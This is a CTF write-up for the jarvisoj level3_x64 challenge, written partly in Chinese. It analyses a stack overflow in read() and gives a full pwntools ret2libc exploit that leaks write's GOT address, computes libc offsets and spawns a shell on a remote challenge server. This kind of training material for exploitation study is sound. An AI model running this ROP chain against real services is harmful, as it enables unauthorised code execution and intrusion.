
jarvisoj_level3_x64

Ubuntu 16 来源:https://github.com/bash-c/pwn_repo


0x01


checksec

[*] '/home/zelas/Desktop/pwn/jarvisoj_level3_x64/level3_x64'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

vulnerable_function()

// IDA decompiler output of the challenge's vulnerable function (see the
// checksec output above: NX enabled, no canary, no PIE).
// buf is 128 (0x80) bytes but read() accepts up to 0x200 bytes, so input
// longer than 0x80 + 0x8 bytes overwrites the saved rbp and then the return
// address — a classic stack buffer overflow. Because NX is on, control flow
// is redirected through ROP gadgets rather than injected shellcode.
// Defensive fix: bound the read to the buffer, e.g. read(0, buf, sizeof(buf)).
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF

write(1, "Input:\n", 7uLL);
return read(0, buf, 0x200uLL); // unbounded: up to 0x200 bytes into a 0x80-byte buffer
}

0x02


思路 ret2libc x64

1.栈溢出泄露write_got

2.利用LibcSearcher计算出system()和str_bin_sh

3.再次溢出执行system()

s 0x80
rbp 0x8
pop_rdi_ret 1
pop_rsi_r15_ret write_got,0
ret write()
write_ret main
s 0x80
rbp 0x8
pop_rdi_ret /bin/sh
ret system

0x03


exp

# Exploit script for the jarvisoj level3_x64 challenge: a two-stage ret2libc
# ROP chain over the unbounded read() in vulnerable_function().
# Stage 1 leaks the address of write() from its GOT entry and returns to main;
# stage 2 overflows again and calls system("/bin/sh").
from pwn import *
from LibcSearcher import *  # currently unused: the LibcSearcher path below is commented out

context(log_level='debug', os='linux', arch='amd64')
io = remote('node4.buuoj.cn', 27818)
# io = remote('pwn2.jarvisoj.com', 9879)
# io = process(["./level3"])
elf = ELF("./level3_x64")

# 0x80 bytes fill buf (char buf[128] at rbp-0x80) and 8 more cover the saved
# rbp; the next 8 bytes written land on the return address.
padding = 0x80 + 0x8
write_plt = elf.symbols['write']
write_got = elf.got['write']
main = elf.symbols['main']
delims = b'Input:\n'
# Gadget addresses are hard-coded; they are stable only because the binary is
# built without PIE (loaded at 0x400000).
pop_rdi_ret = 0x4006b3
pop_rsi_r15_ret = 0x4006b1 # : pop rsi ; pop r15 ; ret
# Observed in gdb: rdx is already large enough when write() is reached, so the
# chain does not set the third argument (count).
# Chain: write(1, write_got, <rdx>) -> main, so the program asks for input again.
payload = flat(b'a' * padding, pop_rdi_ret, 1, pop_rsi_r15_ret, write_got, 0, write_plt, main)
io.sendlineafter(delims, payload)

# Only the low 6 bytes of an amd64 userspace pointer are significant;
# zero-pad to 8 bytes before unpacking with u64.
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] write_address -->', hex(write_addr))

# Alternative: resolve the offsets with LibcSearcher instead of a local libc copy.
# libc = LibcSearcher('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system = libc_base + libc.dump('system')
# bin_sh = libc_base + libc.dump('str_bin_sh')
# NOTE(review): the tag "libc6_2.19-0ubuntu6.15_i386" left here does not match
# the amd64 libc-2.23.so loaded below; presumably stale from another challenge.
libc = ELF('./libc-2.23.so')
# libc base = leaked runtime address minus the symbol's offset inside the library.
libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
# First occurrence of the NUL-terminated "/bin/sh" string inside libc.
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base -->', hex(libc_base))
print('[+] system_address -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))

# Stage 2: same overflow, chain system("/bin/sh") via pop rdi; ret.
payload = flat(b'a' * padding, pop_rdi_ret, bin_sh, system)
io.sendlineafter(delims, payload)
io.interactive()

